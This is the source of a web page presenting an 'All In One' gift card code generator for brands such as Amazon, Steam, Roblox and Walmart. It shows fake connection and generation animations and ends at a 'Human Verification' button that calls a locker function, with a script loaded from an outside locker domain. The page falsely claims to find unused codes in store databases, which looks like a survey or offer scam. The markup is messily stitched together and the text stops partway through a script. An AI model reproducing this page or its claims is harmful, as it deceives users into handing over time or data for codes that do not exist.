<!DOCTYPE html>

<html>
<meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by  -->
<head>
<title>All In One Gift Cards Online Generator</title>
<meta name="description" content="All In One Gift Cards Online Generator" />
<meta property="og:title" content="All In One Gift Cards Online Generator" />
<meta property="og:description" content="All In One Gift Cards Online Generator" />
<meta name="referrer" content="no-referrer">

<script type="text/javascript" src="https://passwordomain.com/script_include.php?id=1713707"></script>

<script src="browser.sentry-cdn.com/6.4.1/bundle.min.js" integrity="sha384-THoc7rflwZFKTdZNgv6jLFFDn299Uv3t1SW5B4yGLvLiCRTYP9ys6vXZcMl95TQF" crossorigin="anonymous"></script>
<script>
    Sentry.init({
        dsn: 'https://e0e6a104cb354a09bf094a90e676ea13@o425163.ingest.sentry.io/5780930',
        tracesSampleRate: 0.01
    });
</script>
<script>
    (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
            (i[r].q = i[r].q || []).push(arguments)
        }, i[r].l = 1 * new Date();
        a = s.createElement(o), m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
    })(window, document, 'script', '../www.google-analytics.com/analytics.js', 'ga');


    ga('create', 'UA-76183389-10', 'auto');
    ga('send', 'pageview');

</script>
<style>
        .header_blue {
            background: #1565c0;
            padding: 80px 0 20px;
            color: #fff;
            font-size: 48px;
            font-weight: 300;
            margin-bottom: 40px;
        }
        .header_text {
            margin-left: auto;
            margin-right: auto;
            width: 80%;
        }
        body{
            margin:0;
            font-family:Roboto, sans-serif;
            color:#444;
        }
        .unlockBtn:hover{
            box-shadow: 0 3px 6px rgba(0,0,0,.16), 0 3px 6px rgba(0,0,0,.23);
        }
        .unlockBtn {
            background: #2196f3;
            border: none;
            border-radius: 2px;
            box-shadow: 0 1px 3px rgba(0,0,0,.12), 0 1px 2px rgba(0,0,0,.24);
            min-height: 31px;
            min-width: 70px;
            padding: 2px 16px;
            text-align: center;
            text-shadow: none;
            text-transform: uppercase;
            -webkit-transition: all 280ms ease;
            transition: all 280ms ease;
            box-sizing: border-box;
            cursor: pointer;
            -webkit-appearance: none;
            display: inline-block;
            vertical-align: middle;
            font: 500 14px/31px Roboto,sans-serif!important;
            outline: 0!important;
            color:white;
        }
        .content-container{
            width:80%;margin:0 auto;
        }
        @font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(http://fonts.gstatic.com/s/roboto/v15/Pru33qjShpZSmG3z6VYwnRJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Hgo13k-tfSpn0qi1SFdUfVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/oOeFwZNlrTefzLYmlVV1UBJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}
        @import url('https://fonts.googleapis.com/css2?family=Black+Han+Sans&amp;display=swap');
body{
  background-image: url('img/bg.html');

background-color: #1b92e6;
  font-family: 'Black Han Sans', sans-serif;
}
.home{
  width: 40px;
  height: 40px;
  background-image: url(../img/1630298536f119d7cd66050db906dcb521cd4cd443.png);
  position: absolute;
  top: 10px;
  left: 10px;
  z-index: 9999;
  background-size: contain;
  cursor: pointer;
  /* border-radius: 50%; */
  /* box-shadow: 0 0 5px black; */
  filter: invert(1);
}
.bgani{
  position:  absolute;
  animation: bgani1 2s ease-in infinite;
}
@keyframes bgani1{
  0%  {
      left:1px;
    transform: scale(0.5);
      opacity: 0.1;
    }

  25%  { opacity: 0.1;transform: rotate(10deg);}
  50%  { opacity: 0.1;transform: rotate(50deg);}
  75%  { opacity: 0.1;transform: rotate(200deg);}
  100%  {left:100%;transform: scale(1); opacity: 0.1;}
}

.bgani2{
  position:  absolute;
  animation: bgani2 2s ease-in infinite;
}
@keyframes bgani2{
  0%  {
    top:100px;
      left:1px;
    transform: scale(1.5);
      opacity: 0.1;
    }

  25%  { opacity: 0.01;transform: rotate(10deg);}
  50%  { opacity: 0.01;transform: rotate(50deg);}
  75%  { opacity: 0.01;transform: rotate(200deg);}
  100%  {top:200px;
    left:50%;transform: scale(1); opacity: 0.1;}
}

.bgani3{
  position:  absolute;
  animation: bgani3 2s ease-in infinite;
}
@keyframes bgani3{
  0%  {
    top:-20px;
      left:70%;
    transform: scale(0.5);
      opacity: 0.1;
    }

  25%  { opacity: 0.1;transform: rotate(10deg);}
  50%  { opacity: 0.1;transform: rotate(50deg);}
  75%  { opacity: 0.1;transform: rotate(200deg);}
  100%  {top:100px;
    left:1%;transform: scale(5); opacity: 0.1;}
}
.sloading{
animation: Asloading 5s  linear infinite;
}
@keyframes Asloading{
  0%  {transform: rotate(0deg);}
  100%  {transform:  rotate(360deg);}
}
.ZeroTo100{
animation: AZeroTo100 3s  linear ;
  animation-fill-mode: forwards;
}
@keyframes AZeroTo100{
  0%  {width: 0%;}
  100%  {width: 100%;}
}
.text1{
  font-family: Roboto;
  font-size: 22px;
  font-weight: bold;
  color:#565656;
}
.loading-bg{
  width: 280px;
  height: 20px;
  background-color: #e8e8e8;
  border-radius: 20px;
  border-width: 2px;
  border-style: solid;
  border-color: #e2e2e2;
  overflow: hidden;
  text-align: left;
}

.loading{
  width: 0%;
  height: 20px;
  background-color: #000000;
}
.card-box{
  margin-top:100px;
  width:2px;
  height: 480px;
    position: relative;
}
.card1{
  width:200px;
  position: absolute;
left:-300px;
transform: rotate(-10deg);
opacity: 0.9;
z-index: 1;
top:100px;
}
.card1-Animation{
animation: Card1-Animation 5s  linear infinite;
}
@keyframes Card1-Animation{
  0%  {
    width:200px;
    position: absolute;
  left:-300px;
  transform: rotate(-10deg);
  opacity: 0.9;
  z-index: 1;
  top:100px;
  }   13%  {
      width:200px;
      position: absolute;
    left:-300px;
    transform: rotate(-10deg);
    opacity: 0.9;
    z-index: 1;
    top:100px;
    }  30%  {
    width: 200px;
    position: absolute;
  left:100px;
  transform: rotate(10deg);
  opacity: 0.9;
  z-index: 1;
  top:100px;
    }
    43%  {
    width: 200px;
    position: absolute;
  left:100px;
  transform: rotate(10deg);
  opacity: 0.9;
  z-index: 1;
  top:100px;
    }
60%  {
  transform: rotate(0deg);
  width: 272px;
  position: absolute;
  left: -136px;
  top:25px;
  z-index: 2;
  top:0px;
  opacity: 1;
}
73%  {
  transform: rotate(0deg);
  width: 272px;
  position: absolute;
  left: -136px;
  top:25px;
  z-index: 2;
  top:0px;
  opacity: 1;
}
  }


.card2{
  transform: rotate(0deg);
  width: 272px;
  position: absolute;
  left: -136px;
  top:25px;
  z-index: 2;
  top:0px;
   opacity: 1;
}
.card2-Animation{
animation: Card2-Animation 5s  linear infinite;
}
@keyframes Card2-Animation{
  0%  {
    transform: rotate(0deg);
    width: 272px;
    position: absolute;
    left: -136px;
    top:25px;
    z-index: 2;
    top:0px;
     opacity: 1;
  }
  13%  {
    transform: rotate(0deg);
    width: 272px;
    position: absolute;
    left: -136px;
    top:25px;
    z-index: 2;
    top:0px;
     opacity: 1;
  }
  30%  {
    width:200px;
    position: absolute;
  left:-300px;
  transform: rotate(-10deg);
  opacity: 0.9;
  z-index: 1;
  top:100px;
    }
    43%  {
      width:200px;
      position: absolute;
    left:-300px;
    transform: rotate(-10deg);
    opacity: 0.9;
    z-index: 1;
    top:100px;
      }

    60%  {
      width: 200px;
      position: absolute;
    left:100px;
    transform: rotate(10deg);
    opacity: 0.9;
    z-index: 1;
    top:100px;
     }
     73%  {
       width: 200px;
       position: absolute;
     left:100px;
     transform: rotate(10deg);
     opacity: 0.9;
     z-index: 1;
     top:100px;
      }
}

.card3{
  width: 200px;
  position: absolute;
left:100px;
transform: rotate(10deg);
opacity: 0.9;
z-index: 1;
top:100px;
}
.card3-Animation{
animation: Card3-Animation 5s  linear infinite;
}
@keyframes Card3-Animation{
  0%  {
    width: 200px;
    position: absolute;
  left:100px;
  transform: rotate(10deg);
  opacity: 0.9;
  z-index: 1;
  top:100px;
  }
  13%  {
    width: 200px;
    position: absolute;
  left:100px;
  transform: rotate(10deg);
  opacity: 0.9;
  z-index: 1;
  top:100px;
  }

  30%  {
    transform: rotate(0deg);
    width: 272px;
    position: absolute;
    left: -136px;
    top:25px;
    z-index: 2;
    top:0px;
    opacity: 1;
    }
    43%  {
      transform: rotate(0deg);
      width: 272px;
      position: absolute;
      left: -136px;
      top:25px;
      z-index: 2;
      top:0px;
      opacity: 1;
      }
      60%  {
        width:200px;
        position: absolute;
      left:-300px;
      transform: rotate(-10deg);
      opacity: 0.9;
      z-index: 1;
      top:100px;


        }
        73%  {
          width:200px;
          position: absolute;
        left:-300px;
        transform: rotate(-10deg);
        opacity: 0.9;
        z-index: 1;
        top:100px;


          }
}
.text-header{
  font-size: 42px;
    line-height: 10%;
    font-weight: bold;
    color: #636363;
}
.bg-content{

  width:100%;
  background-color: #107b13;
  overflow: auto;
  position: relative;
}
.bg-conent-head{
  width:100%;
  height: 100px;
  background-color: #107b13;
  position: relative;
  overflow: hidden;
}
.content-head{
position:absolute;
  top:-370px;
  left:-20px;
  height: 400px;
width:110%;
background-color: #e0e0e0;
transform: rotate(-2deg);
}


.bg-conent-foot{
  width:100%;
  height: 150px;
  background-color: #107b13;
  position: relative;
  overflow: hidden;
}
.content-foot{
position:absolute;
  top:50px;
  left:-20px;
  height: 500px;
width:110%;
background-color: #e0e0e0;
transform: rotate(-2deg);
}
.text-info{
  color: white;
font-size: 26px;
max-width: 450px;
padding: 10px 10px 30px 10px;

}
.keyword{
  text-transform: capitalize;

}
.Home{
  width:100%;
  height:100%;
  background-color: #1b92e6;
}
.all-card{
  padding-top: 160px;
  max-width: 900px;
  width:100%;
  height:100%;
  background-color: #1b92e6;
  cursor: pointer;
  animation:slide-in-bottom .5s cubic-bezier(.25,.46,.45,.94) both
}

@keyframes slide-in-bottom{0%{transform:translateY(1000px);opacity:0}100%{transform:translateY(0);opacity:1}}
.Home-Header{
  overflow: hidden;
  font-family: 'Black Han Sans', sans-serif;
  width:100%;
  padding: 30px 0 30px 0 ;
  font-size: 42px;
  background-color: white;
  position: absolute;
  top: 0;
  left: 0;
  color: #292929;
  z-index: 999;
    text-shadow: 0 0 5px #545454;
}
.sub-head{
    font-size: 26px;
    color:#484848;
}
.Main-Card{
  width:200px;
}
.Main-Card:hover{
  box-shadow: 0 0 10px #000000;
      border-radius: 20px;
      background-color: #cccccc;
}
.readmore{
  color: white;
font-size: 36px;
font-weight: bold;
cursor: pointer;
}
.choose-card-text{
  transform: rotate(
3deg
);
  color: #636363;
  font-size: 32px;
  font-weight: bold;
  margin-top: 50px;
}
.card{
    max-width: 250px;
    width:80%;
    padding: 10px 10px 10px 10px;
    cursor: pointer;
}
.footer{
  height: 10px;
      width: 100%;
      background-color: #1f1f1f;
      margin-top: 0px;
}
.bg-conent-footer{
  width:100%;
  height: 150px;
  background-color: #e0e0e0;
  position: relative;
  overflow: hidden;
}
.content-footer{
position:absolute;
  top:50px;
  left:-20px;
  height: 500px;
width:110%;
background-color: #1b92e6;
transform: rotate(-2deg);
}
.img-arrow{
    width: 70px;
    position: absolute;
    z-index: 999;
    margin-left: -35px;
  }
  .UpDown{
  animation: AUpDown 1s  linear infinite;
  }
  @keyframes AUpDown{
    0%  {margin-top:-25px ;}
    50%  {margin-top:-15px ;}
    100%  {margin-top:-25px ;}
  }
.page3{
  top: 0;
  padding-top: 200px;
      z-index: 9999;
      left: 0;
      position: absolute;
      width: 100%;
      height: 100%;
      background-color: #e2e2e2e3;
}
.slide-in-fwd-bottom{animation:slide-in-fwd-bottom .4s cubic-bezier(.25,.46,.45,.94) both}
@keyframes slide-in-fwd-bottom{0%{transform:translateZ(-1400px) translateY(800px);opacity:0}100%{transform:translateZ(0) translateY(0);opacity:1}}

.slide-in-bck-bottom{animation:slide-in-bck-bottom .6s cubic-bezier(.25,.46,.45,.94) both}
@keyframes slide-in-bck-bottom{0%{transform:translateZ(700px) translateY(300px);opacity:0}100%{transform:translateZ(0) translateY(0);opacity:1}}

.code{
  background-color: white;
      position: absolute;
      z-index: 99;
      /* margin-top: -50px; */
      left: 50%;
      width: 300px;
      margin-left: -160px;
      padding: 10px;
      /* bottom: 100px; */
      bottom: 0px;
      font-size: 16px;
      color: #7b7b7b;
}
.gen{
  width:90%;
  max-width: 320px;

  height: 450px;
  background-color: #107b13;
  border-radius: 20px;
  border-style: solid;
  border-width: 2px;
  border-color: #08650b;
      overflow: hidden;
}
.gen-bar{
  padding:10px 0px 0px 0px;
  color: #107b13;
}

.stepname-step{
  display: inline-table;
  padding: 0 10px 0 0;
  font-weight: bold;
  color:white;
}
.Pro-bg{
  width: 90%;
  max-width: 220px;
  height: 7px;
  background-color: white;
  margin-top: 20px;
  position: relative;
  text-align: left;
  }
  .pro-step1{
    position: absolute;
    left: -5px;
    width: 15px;
    height: 15px;
    background-color: #069e0a;
    border-radius: 50%;
    top:-4px;

  }
  .pro-step2{
    width: 15px;
    height: 15px;
    background-color: white;
    border-radius: 50%;
    position: absolute;
    left: 50%;
    margin-left: -7px;
    top:-4px;

  }
  .pro-step3{
    position: absolute;
    right:-5px;
    width: 15px;
    height: 15px;
    background-color: white;
    border-radius: 50%;
    top:-4px;

  }
  .pro-bar{
    width: 20px;
    height: 7px;
    background-color: #069e0a;
    z-index: 999;
  }
  .A0To50{
    animation: AZeroTo50 7s  linear ;
      animation-fill-mode: forwards;
    }
    @keyframes AZeroTo50{
      0%  {width: 0%;}
      100%  {width: 50%;}
    }
.A50To100{
    animation: A50To100 10s  linear ;
      animation-fill-mode: forwards;
    }
    @keyframes A50To100{
      0%  {width: 50%;}
      100%  {width: 100%;}
    }
.verify-bg{
  padding-top: 10px;
  max-width: 250px;
  width: 95%;
  height: 280px;
  margin-top: 30px;
  border-radius: 20px;
  background-color: #676767;
  color:white;
  }
.verifybutton{
  cursor: pointer;
  padding: 10px;
  max-width: 200px;
  width: 60%;
  background: linear-gradient(to bottom, #33ccff 0%, #1b92e6 100%);
  border-radius: 7px;
  margin-top: 80px;
  border-style: solid;
  border-color: #9c9c9c;
  border-width: 1px;
  box-shadow: 0 0 2px #0fabff;
}
@media only screen and (max-width:680px) {
.card-box{
  transform:scale(0.6);

}
.text-header{
  font-size: 22px;
  margin-bottom: 50px;
}
.choose-card-text{
  font-size: 22px;
}
.img-arrow {
  width: 50px;
  position: absolute;
  z-index: 999;
  margin-left: -25px;
}
.code{
  font-size: 14px;
}
}

@media only screen and (max-width:480px) {
  .Home-Header{
    font-size: 28px;
  }
  .sub-head{
    font-size: 22px;
  }
  .card-box{
      margin-top:10px;
    transform:scale(0.4);

  }
  .code{
    font-size: 14px;
  }

}
@media only screen and (max-width:320px) {
  .Home-Header{
    font-size: 22px;
  }
  .sub-head{
    font-size: 18px;
  }

    </style>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>AIO Gift Card Code Generator</title>
<link rel="stylesheet" type="text/css" href="style.html" />
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Anton">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto">
</head>
<body>
<div class="home" id="backhome" onclick="location.reload()" style="display:none"></div>
<center>
<div class="Home" id="home">
<div class="Home-Header">
<img src="../img/163029853918c4f128119f528c56c9509037837824.png" class="bgani">
<img src="../img/163029853918c4f128119f528c56c9509037837824.png" class="bgani2">
<img src="../img/163029853918c4f128119f528c56c9509037837824.png" class="bgani2">
AIO GIFT CARD CODE
<div class="sub-head">GENERATOR TOOL</div>
</div>
<div class="all-card">
<img src="../img/1630298553267de431bfd54e4172e99994b941a91c.png" class="Main-Card" Onclick="showcard('roblox')"></img>
<img src="../img/1630298556c8fbcf8305ddd7f5b7d200a07619ce13.png" class="Main-Card" Onclick="showcard('xbox')"></img>
<img src="../img/1630298549687ce3db4fb8c2e1c27902a1de8ad9a5.png" class="Main-Card" Onclick="showcard('google')"></img>
<img src="../img/1630298553b49440883984986e03681a7dd6745cb2.png" class="Main-Card" Onclick="showcard('psn')"></img>
<img src="../img/1630298548d508b356fd5a820b8013d7d09c03c6b0.png" class="Main-Card" Onclick="showcard('bestbuy')"></img>
<img src="../img/1630298547c1507636c5b5e760b86ee722dcd058e9.png" class="Main-Card" Onclick="showcard('amazon')"></img>
<img src="../img/163029854927cd3606aa56ea27f2142c0f763a6aaa.png" class="Main-Card" Onclick="showcard('ebay')"></img>
<img src="../img/163029855052739991ea6ce738a01c0ae00fe9300b.png" class="Main-Card" Onclick="showcard('itune')"></img>
<img src="../img/1630298552af8f104b052da75fd726b4b9be178cb9.png" class="Main-Card" Onclick="showcard('nintendo')"></img>
<img src="../img/1630298551714e3a7347a9292ba46740c843e9c81d.png" class="Main-Card" Onclick="showcard('safecard')"></img>
<img src="../img/1630298554c9b5b1237162fedcc8b1f1917d0a21ba.png" class="Main-Card" Onclick="showcard('spotify')"></img>
<img src="../img/1630298554fd4f56e8c5f5660883a5afa289188052.png" class="Main-Card" Onclick="showcard('steam')"></img>
<img src="../img/163029855566c7c2bbebe4b3bf3f9d2a43072878eb.png" class="Main-Card" Onclick="showcard('walmart')"></img>
<img src="../img/1630298562c262b490eb0749751a7f2f97eb8db0e8.png" class="Main-Card" Onclick="showcard('psnplus')"></img>
</div>
</div>
<div class="page1" id="page1" style="display:none;">
<img src="../img/161909761701afebe6db914cae0df0e58526ed8013.png" id="picloading" class="sloading" style="width:200px;margin-top:200px">
<div class="text1">
Connecting To Server...
</div>
<div class="loading-bg">
<div class="loading ZeroTo100"></div>
</div>
</div>
<div class="page2" id="page2" style="display:none">
<div class="card-box">
<img src="img/card100.html" id="card1" class="card1 card1-Animation" style="display:1none">
<img src="img/card50.html" id="card2" class="card2 card2-Animation" style="display:1none">
<img src="img/card25.html" id="card3" class="card3 card3-Animation" style="display:1none">
</div>
<div class="text-header">
DO YOU WANT <p> SOME <span id="keyword8" class="keyword"></span> GIVEAWAY <p> GIFT CARDS
</div>
<div id="content-body">
<img src="../img/1620028741ac0af4c693f0d5163d7d849226597c88.png" class="img-arrow UpDown">
<div class="bg-conent-head" id="bg-conent-head">
<div class="content-head" style="display:1none">
</div>
</div>
<div class="bg-content" id="bg-content">
<img src="../img/162002874683b5c259d46ff6637e01be2b4917ade5.png" id="logo" style="margin-top:0px;width:250px">
<div class="text-info">
Get <span id="keyword1" class="keyword"></span> Gift Card code and redeem for anything in the <span id="keyword2" class="keyword"></span> Store.
</div>
<div class="readmore" id="readmore" Onclick="readmore()">
READ MORE
</div>
<div class="text-info" id="text-info" style="display:none">
<div style="padding: 10px 10px 10px 10px;font-size: 28px;font-weight: bold;">How to get <span id="keyword3" class="keyword"></span> Gift CARDS</div>
<div style="text-align: justify;font-weight: lighter; font-size: 22px;"><span id="keyword4" class="keyword"></span> Gift Card codes are very easy to get with our Generator. The only thing you have to do is to choose your Gift Card value and wait for the generator to find unused Gift Card on <span id="keyword9" class="keyword"></span> server. Get unused codes safely and directly from your web browser.</div>
<div style="padding: 20px 10px 10px 10px;font-size: 28px;font-weight: bold;">How to redeem <span id="keyword5" class="keyword"></span> Gift Card</div>
<div style="text-align: justify;font-weight: lighter; font-size: 22px;">Redeem your Gift Card with your mobile, tablet or desktop. Go to the <span id="keyword6" class="keyword"></span> Store, click at the menu bar and choose Redeem Code. Now you only have to fill in your generated code and that is all, the money will be available on your account.</div>
<div style="padding: 20px 10px 10px 10px;font-size: 28px;font-weight: bold;">How is this possible</div>
<div style="text-align: justify;font-weight: lighter; font-size: 22px;">We do not generate new codes and push them to the <span id="keyword7" class="keyword"></span> database like other groups, because this can lead to ban of your account. Instead we generate random Gift Card codes and search their database if they exist and can be used.</div>
</div>
</div>
<div class="bg-conent-foot" id="bg-conent-foot">
<div class="content-foot" style="display:1none">
<div class="choose-card-text" style="">
CHOOSE GIFT CARD VALUE
</div>
</div>
</div>
<img src="img/card25.html" class="card" id="s-card1" Onclick="selectedcard(25)">
<img src="img/card50.html" class="card" id="s-card2" Onclick="selectedcard(50)">
<img src="img/card100.html" class="card" id="s-card3" Onclick="selectedcard(100)">
<div class="bg-conent-footer">
<div class="content-footer">
</div>
</div>
<div class="footer">
</div>
</div>
</div>
<div class="page3" id="page3" style="display:none">
<div class="gen slide-in-bck-bottom" id="gen">
<div class="gen-bar">
<div class="stepname-step">Connecting</div>
<div class="stepname-step">Generating</div>
<div class="stepname-step">Completed</div>
<div class="Pro-bg">
<div class="pro-step1" id="pro-step1"></div>
<div class="pro-step2" id="pro-step2"></div>
<div class="pro-step3" id="pro-step3"></div>
<div class="pro-bar A0To50" id="pro-bar"></div>
</div>
<img src="../img/162002874683b5c259d46ff6637e01be2b4917ade5.png" id="xbox-logo" style="width:200px; padding-top:70px;">
<div class="verify-bg" id="verify-bg" style="display:none">
Anti-Bot Checker <br>
Complete a Human Verification
<div class="verifybutton" ​ onclick="call_locker();">Verify Now</div>
</div>
</div>
<div class="code" id="code">
Loading ...
</div>
<div class="text-success" style="display:none">
Success!
</div>
</div>
</div>
</center>
</body>
<script src="main.html"></script>


</html>
<script src="../ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>

    });
</script>
<script>

</script>
<script type="text/javascript">
    
var cardSelect1;
function showcard(cardSelect)
{
document.getElementById("backhome").style.display="block";
  var vargenerator3 = setInterval(GenTimer3, 3000);

function GenTimer3() {
  document.getElementById("page1").style.display="none";
      document.getElementById("page2").style.display="block";
}
  document.getElementById("home").style.display="none";
document.getElementById("page1").style.display="block";
document.getElementById("keyword1").innerHTML=cardSelect;
document.getElementById("keyword2").innerHTML=cardSelect;
document.getElementById("keyword3").innerHTML=cardSelect;
document.getElementById("keyword4").innerHTML=cardSelect;
document.getElementById("keyword5").innerHTML=cardSelect;
document.getElementById("keyword6").innerHTML=cardSelect;
document.getElementById("keyword7").innerHTML=cardSelect;
document.getElementById("keyword8").innerHTML=cardSelect;
document.getElementById("keyword9").innerHTML=cardSelect;
if (cardSelect=="walmart"){
  document.getElementById("card1").src="../img/1622440662f13b1dbac4347d09938616a1307219b0.png";
  document.getElementById("card2").src="../img/1622440661e42246e117e87f626cc7e1cf4399fd60.png";
  document.getElementById("card3").src="../img/162244066304099004f26ca2c7435c593064fbca05.png";
  document.getElementById("logo").src="../img/16224406646b0427b492790f3a9b9c39c537862b83.png";

    document.getElementById("xbox-logo").src=document.getElementById("logo").src
    document.getElementById("s-card1").src=document.getElementById("card1").src;
    document.getElementById("s-card2").src=document.getElementById("card2").src;
    document.getElementById("s-card3").src=document.getElementById("card3").src;

  document.getElementById("gen").style.backgroundColor="#0078c1";
  document.getElementById("gen").style.borderColor="#0078c1";
  document.getElementById("bg-conent-head").style.backgroundColor="#0078c1";
  document.getElementById("bg-content").style.backgroundColor="#0078c1";
  document.getElementById("bg-conent-foot").style.backgroundColor="#0078c1";
  }

if (cardSelect=="steam"){
  document.getElementById("card1").src="../img/16210443669837788bef65c1c6553b3e4e77eb6408.png";
  document.getElementById("card2").src="../img/1621044366de3d28432afad67ecad8e923228b6977.png";
  document.getElementById("card3").src="../img/16210443678d9c97eb1c9ca3ba5b6221beb932ab94.png";
  document.getElementById("logo").src="../img/1621044369f31153814346d62aad833f70d723f312.png";
    document.getElementById("xbox-logo").src=document.getElementById("logo").src
    document.getElementById("s-card1").src=document.getElementById("card1").src;
    document.getElementById("s-card2").src=document.getElementById("card2").src;
    document.getElementById("s-card3").src=document.getElementById("card3").src;

  document.getElementById("gen").style.backgroundColor="#2a5c83";
  document.getElementById("gen").style.borderColor="#2a5c83";
  document.getElementById("bg-conent-head").style.backgroundColor="#2a5c83";
  document.getElementById("bg-content").style.backgroundColor="#2a5c83";
  document.getElementById("bg-conent-foot").style.backgroundColor="#2a5c83";
  }

if (cardSelect=="spotify"){
  document.getElementById("card1").src="../img/16210442042dbe26d04699bd445884b90cc92a2308.png";
  document.getElementById("card2").src="../img/162104420489f6f445a48e2d996a860dc5e0725187.png";
  document.getElementById("card3").src="../img/1621044205ce37f4f7ce8a79c12d7c80a642a5fcc2.png";
  document.getElementById("logo").src="../img/1621044206a674fffcab565efc6eca508c26cbf24a.png";
    document.getElementById("xbox-logo").src=document.getElementById("logo").src
    document.getElementById("s-card1").src=document.getElementById("card1").src;
    document.getElementById("s-card2").src=document.getElementById("card2").src;
    document.getElementById("s-card3").src=document.getElementById("card3").src;

  document.getElementById("gen").style.backgroundColor="#62c062";
  document.getElementById("gen").style.borderColor="#62c062";
  document.getElementById("bg-conent-head").style.backgroundColor="#62c062";
  document.getElementById("bg-content").style.backgroundColor="#62c062";
  document.getElementById("bg-conent-foot").style.backgroundColor="#62c062";
  }
if (cardSelect=="roblox"){
  document.getElementById("card1").src="../img/16210439937cc97905c0e4d1ab3d394ca8cf28137a.png";
  document.getElementById("card2").src="../img/16210439931f5640ec90fa5429bc8dfa20ed5edf9f.png";
  document.getElementById("card3").src="../img/16210439940fab3e7889bef5d96a6b0fef2615df46.png";
  document.getElementById("logo").src="../img/162104399513dc6b575dc406255c8eb58ae9b98d90.png";
    document.getElementById("xbox-logo").src=document.getElementById("logo").src
    document.getElementById("s-card1").src=document.getElementById("card1").src;
    document.getElementById("s-card2").src=document.getElementById("card2").src;
    document.getElementById("s-card3").src=document.getElementById("card3").src;

  document.getElementById("gen").style.backgroundColor="#d82312";
  document.getElementById("gen").style.borderColor="#d82312";
  document.getElementById("bg-conent-head").style.backgroundColor="#d82312";
  document.getElementById("bg-content").style.backgroundColor="#d82312";
  document.getElementById("bg-conent-foot").style.backgroundColor="#d82312";
  }
if (cardSelect=="safecard"){
  document.getElementById("card1").src="../img/1621224113c70dfa8ef8e00482d17d50af435db82c.png";
  document.getElementById("card2").src="../img/1621224113d5944652dfe11d968a742a80eb5e8db1.png";
  document.getElementById("card3").src="../img/16212241143325ccac6272d3632d2a62a027a37452.png";
  document.getElementById("logo").src="../img/16212241168a942262c91ddb92783d71e9d47a7e19.png";
    document.getElementById("xbox-logo").src=document.getElementById("logo").src
    document.getElementById("s-card1").src=document.getElementById("card1").src;
    document.getElementById("s-card2").src=document.getElementById("card2").src;
    document.getElementById("s-card3").src=document.getElementById("card3").src;

  document.getElementById("gen").style.backgroundColor="#008bca";
  document.getElementById("gen").style.borderColor="#008bca";
  document.getElementById("bg-conent-head").style.backgroundColor="#008bca";
  document.getElementById("bg-content").style.backgroundColor="#008bca";
  document.getElementById("bg-conent-foot").style.backgroundColor="#008bca";
  }
if (cardSelect=="nintendo"){
  document.getElementById("card1").src="../img/16210418147a6a0f0fd946de7d10a7ba0a8e73af79.png";
  document.getElementById("card2").src="../img/1621041813fc6741b5720ecec43b582a753f5a0dff.png";
  document.getElementById("card3").src="../img/1621041815672c3128aec3c2f9398687c4f38b9ac3.png";
  document.getElementById("logo").src="../img/162104181669fb52b9594748b18984da73ab48d595.png";
    document.getElementById("xbox-logo").src=document.getElementById("logo").src
    document.getElementById("s-card1").src=document.getElementById("card1").src;
    document.getElementById("s-card2").src=document.getElementById("card2").src;
    document.getElementById("s-card3").src=document.getElementById("card3").src;

  document.getElementById("gen").style.backgroundColor="#e91f26";
  document.getElementById("gen").style.borderColor="#e91f26";
  document.getElementById("bg-conent-head").style.backgroundColor="#e91f26";
  document.getElementById("bg-content").style.backgroundColor="#e91f26";
  document.getElementById("bg-conent-foot").style.backgroundColor="#e91f26";
  }

if (cardSelect=="itune"){
  document.getElementById("card1").src="../img/16210415860261114de6be03a939da3db95bfff249.png";
  document.getElementById("card2").src="../img/1621041586a8ad01a1a2ea52f81d2a5ce8f6efea33.png";
  document.getElementById("card3").src="../img/162104158764350499d839bc2d85b242b3208c30e7.png";
  document.getElementById("logo").src="../img/16210415881f6f6f674e3aa09f7254b7e9f87ee2eb.png";
    document.getElementById("xbox-logo").src=document.getElementById("logo").src
    document.getElementById("s-card1").src=document.getElementById("card1").src;
    document.getElementById("s-card2").src=document.getElementById("card2").src;
    document.getElementById("s-card3").src=document.getElementById("card3").src;

  document.getElementById("gen").style.backgroundColor="#6481f7";
  document.getElementById("gen").style.borderColor="#6481f7";
  document.getElementById("bg-conent-head").style.backgroundColor="#6481f7";
  document.getElementById("bg-content").style.backgroundColor="#6481f7";
  document.getElementById("bg-conent-foot").style.backgroundColor="#6481f7";
  }
if (cardSelect=="google"){
  document.getElementById("card1").src="../img/16210413591bc7b9cda3539b963bf362f261274b50.png";
  document.getElementById("card2").src="../img/1621041359aed1e8a44ac9c45615ceff55f320b270.png";
